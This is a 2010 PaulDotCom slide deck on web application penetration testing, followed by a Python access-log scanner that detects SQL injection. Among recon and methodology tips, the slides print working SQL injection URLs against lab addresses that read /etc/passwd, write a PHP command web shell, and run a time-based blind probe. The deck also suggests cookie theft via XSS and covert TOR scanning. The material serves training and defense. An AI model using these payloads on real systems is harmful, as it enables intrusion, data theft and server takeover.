Web Application Penetration Testing Kung Fu

Tips, Tricks and Techniques for more effective web app testing
John Strand, Paul Asadoorian
http://pauldotcom.com
Who are we?
• I had this really boring slide about who we are
• Then I realized that’s not who we really are
• What follows is the “Powerpoint” version of who we are...
http://pauldotcom.com
January 2010
We Like To Hack Naked
We Drink Beer
We Enjoy Computer Destruction
We Do This Podcast Thing
The Crew
John “Father John” Strand
Paul “Salad Shooter” Asadoorian
Larry “Dirty Uncle” Pesce
Mick “Jr. Salad Shooter” Douglas
Carlos “Dark0perator” Perez
“Byte_Bucket”
Mike “The Original Intern” Perez
Darren “Girly Mustache” Wigley
Approach to Web Application Testing
• The most important part of a test is understanding business logic
• Looking for XSS, SQLi, RFI, etc. is important, but there is so much more
• Web applications are also a heavily used attack vector
  - Because that is where the data is!
• Once again, we need to think like an attacker
Lesson #1
• Recon is the most important step!
• How can you test what you don’t know exists?
• The right term is “spidering”
• Manual and automated approaches are needed!
Enumeration
• Manual - Browse the web site through a proxy
• Automated - Use Nessus or w3af
• Ideally you have a tool that will do both, spider while you browse
• Even Nikto can help find areas of the site that are not linked to in the application
Manually Investigate Findings From Automated Tools
• XSS - Make it work! Add the proper code and characters to get it working, then come up with useful examples
• Pop-up boxes are anti-climactic
• Better to steal cookies and other information from the browser
• Think about how the application works, then get creative!
The Most Important Thing
• Surf the site!
• Do not get hung up on tools, they only go so far
• While automation is great because it greatly speeds up a test, it is merely a lens through which to view your target application.
• Authentication is very important, make sure you log in successfully
• screen shot, show POST, cookies, etc..
How many new targets can you find?
+ Server: Apache/1.3.41 (Unix) mod_perl/1.29 mod_ssl/2.8.31 OpenSSL/0.9.7e
- /robots.txt - contains 1 'disallow' entry which should be manually viewed. (GET)
+ OSVDB-0: ETag header found on server, inode: 3278940, size: 70, mtime: 0x44bd5d50
+ OpenSSL/0.9.7e appears to be outdated (current is at least 0.9.8i) (may depend on server version)
+ OSVDB-3233: GET /mailman/listinfo : Mailman was found on the server.
+ OSVDB-3268: GET /pdf/ : Directory indexing is enabled: /pdf
+ OSVDB-3092: GET /archive/ : This might be interesting...
+ OSVDB-3092: GET /beta/ : This might be interesting...
+ OSVDB-3092: GET /news : This may be interesting...
+ OSVDB-3092: GET /tools/ : This might be interesting...
+ OSVDB-3268: GET /images/ : Directory indexing is enabled: /images
+ OSVDB-3268: GET /static/ : Directory indexing is enabled: /static
+ OSVDB-3233: GET /icons/README : Apache default file found.
Recon: Waffit
• Web application firewalls are becoming more prevalent
• Not as much as they should be, but they are out there
• Identifying the Web Application Firewall is an important step in assessing the target infrastructure and capabilities
• We also get an understanding of the security team’s awareness
• Enter Waffit
Recon: Waffit (2)
• Developed by Sandro Gauci and Wendel Henrique
• Focus is identifying Web Application Firewalls
• Needs help
• This is an area where you can contribute back to a cool project
• http://code.google.com/p/waffit/
Example #1
Example #2: What?
Sneaky Web Recon
• Sometimes we are not testing tech
• Sometimes we are testing people
• Many current assessments have you give your IP address to the client, then they open their firewall up just for you
  - That is great
  - However…
• We should also test the security team to see how they react to a test
• This may require you to get… creative
TOR Revisited
• We have been playing with this for some time
• Moxie Marlinspike’s tools
  - www.thoughtcrime.org/
• Defcon presentation by Valsmith and friends
• John’s Tech segment
  - http://pauldotcom.com/2009/08/scanning-through-a-tor-network.html
• Mick added to the research
  - http://pauldotcom.com/wiki/index.php/Episode182#Sneaky_web_crawling_.26_recon:_a_tech_segment_by_Mick
Can this suck?
• You bet
• TOR is slow, even under the best of circumstances
• Nodes come and go
• Some won’t allow port scanning
• Some are capturing everything you send through them
• Not for the faint of heart
Mick’s Approach
• Get TOR running
• Then export your HTTP proxy
• Start crawling
• export http_proxy=http://127.0.0.1:8118
  wget -r -t10 http://site.to.crawl.com/ -o crawl.log
• You may need -tX (the wget retry count)
• If your URL/URI includes special characters like "&" you need to escape it!
  - Slashies! \\\\ Wee! Slashies!!
When is an attack not an attack?
• When you don’t look for it
• Problem… Only looking for known vulnerability types (e.g. XSS, SQLi, XSRF, etc.)
• If you can be replaced by a tool… You will be
• We need to look for manual attack vectors
• Just look at operating systems
• Simple, consistent and widely deployed
  - We still can’t get it right
  - Web applications are far more complex
Attack Approach #1
• Surf to the site!
• Back to the crayons
  - Cue spiderman outfit
• Start to draw a map of the site
• Think through business logic
• phpmyadmin
Approach #2
• Look for the ability to upload “stuff”
• Then… Start uploading evil
  - Malware
  - PHP files
  - Pictures of Larry with a Wireless router
• If you can upload entire files you are just a short hop away from owning the server
  - SharePoint?
iFrame Injection is Your Friend
• Many tools miss this
• If I can embed an iFrame in your server I can attack your users, even if your server is not attacking them
• iFrames reference other sites on the net.. Like your evil BeEF server, or a Metasploit server that is hosting SET goodness
• Attackers are doing this, why can’t you?
Carryover Data #1
• Many tools look for vulnerabilities on a specific page
  - Simple Stimulus and Response
• However, many sites do not work this way
  - Input data on page X then the data is displayed back on page Y, D, and C in different ways
• Traditionally people look for Stored XSS
• Takes time with the application
• Customer Service Email Example
Carryover Data #2
• Will any of the data go someplace else?
  - XLS?
  - PDF?
  - Different database?
  - Different applications?
• Sometimes the system you can attack is not right in front of you!
• Ed’s Incident Paleontology
  - Attacks that keep on giving!
Shodan
• Cue Barry White… Can’t get enough
• If you have something cool.. The guys at pentestit will come up with a list
  - http://pentestit.com/shodan-queries/
• Just a few
  - http://shodan.surtri.com/?q=Wordpress
  - http://shodan.surtri.com/?q=Joomla
  - http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands%22
• Sometimes the best way to own a webserver is by owning the server first!
Feed the Troll
• What you find needs to be given to the other
members of your team
• Social Engineering
• Network Testing
• Enter Cewl
  - www.digininja.org/projects/cewl.php
• DigiNinja, PDC thinks You kick ass…
Exploitation
SQL Injection - Protect your information
CREATE USER 'readonly'@'localhost' IDENTIFIED BY 'readonly';
GRANT SELECT ON *.* TO 'readonly'@'localhost' WITH GRANT OPTION;
CREATE USER 'readonly'@'%' IDENTIFIED BY 'readonly';
GRANT SELECT ON *.* TO 'readonly'@'%' WITH GRANT OPTION;
SQL Injection - w00t
• http://192.168.1.26/Image_voting/index.php?show=-7%20union%20select%201,concat_ws(0x3a,load_file(%22/etc/passwd%22)),3,4,5-
SQL Injection - w00t * 2
• http://192.168.1.26/phpbms/modules/bms/invoices_discount_ajax.php?id=-1%20UNION%20SELECT%20%22%3C?%20system($_REQUEST['cmd']);%20?%3E%22%20INTO%20OUTFILE%20%22/var/data/mt-blogs/images/cmd.php%22%20
Blind SQL Injection
• /Image_voting/index.php?comment_name=&id=6&vote=10&comment_text=&show=3%20AND%20SLEEP(12)=0
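As an added defensive example (not from the slides): a Python scanner that URL-decodes the query string of Apache-style access-log lines and flags the UNION SELECT, load_file(), INTO OUTFILE and SLEEP() patterns used in the three request URLs above. The log lines are constructed samples modelled on those URLs; the client address, timestamps and status codes are invented.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (common log format), modelled on the
# three request URLs shown in the slides. Not real traffic.
SAMPLE_LOG = """\
192.168.1.50 - - [12/Jan/2010:10:01:02 -0500] "GET /Image_voting/index.php?show=7 HTTP/1.1" 200 1834
192.168.1.50 - - [12/Jan/2010:10:01:09 -0500] "GET /Image_voting/index.php?show=-7%20union%20select%201,concat_ws(0x3a,load_file(%22/etc/passwd%22)),3,4,5-- HTTP/1.1" 200 5120
192.168.1.50 - - [12/Jan/2010:10:02:31 -0500] "GET /phpbms/modules/bms/invoices_discount_ajax.php?id=-1%20UNION%20SELECT%20%22%3C?%20system($_REQUEST['cmd']);%20?%3E%22%20INTO%20OUTFILE%20%22/var/data/mt-blogs/images/cmd.php%22 HTTP/1.1" 200 88
192.168.1.50 - - [12/Jan/2010:10:03:15 -0500] "GET /Image_voting/index.php?comment_name=&id=6&vote=10&comment_text=&show=3%20AND%20SLEEP(12)=0 HTTP/1.1" 200 1834
"""

# Common log format prefix: client, ident, user, [timestamp], "METHOD URL PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+)'
)

# Signatures for the four techniques the slides demonstrate, matched case-insensitively
# against the *decoded* query string so %20/%22 encoding does not hide them.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("file-read",    re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write",   re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("time-based",   re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
]

def decode_query(url: str) -> str:
    """Return the query string percent-decoded twice, so %25-double-encoded payloads also surface."""
    query = url.partition("?")[2]
    return unquote_plus(unquote_plus(query))

def scan_line(line: str):
    """Parse one log line; return a finding dict if any signature matches, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_query(m.group("url"))
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "path": m.group("url").partition("?")[0], "hits": hits}

def scan_log(text: str) -> list:
    """Scan every line of an access log and return the findings in log order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]
```

Run `scan_log(SAMPLE_LOG)` to see the three injected requests flagged while the benign `show=7` request passes; the double decode is what keeps `%2520`-style evasion from slipping past the patterns.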
SQL Injection
• Do something useful with it!
  - Download all records from the database
  - Get a shell
  - Enumerate information
• There are some great resources
  - http://www.greensql.net/publications/backdoor-webserver-usingmysql-sql-injection
  - http://ha.ckers.org/sqlinjection/
  - http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/
/* End */
• Presentations: http://pauldotcom.com/presentations.html
• Radio: http://pauldotcom.com/radio
• Live Stream: http://pauldotcom.com/live
• Forum: http://forum.pauldotcom.com/
• Mailing List: http://mail.pauldotcom.com
• Webcasts: http://pauldotcom.com/webcasts
• Email: psw@pauldotcom.com
• *New* PaulDotCom Insider http://pauldotcom.ning.com/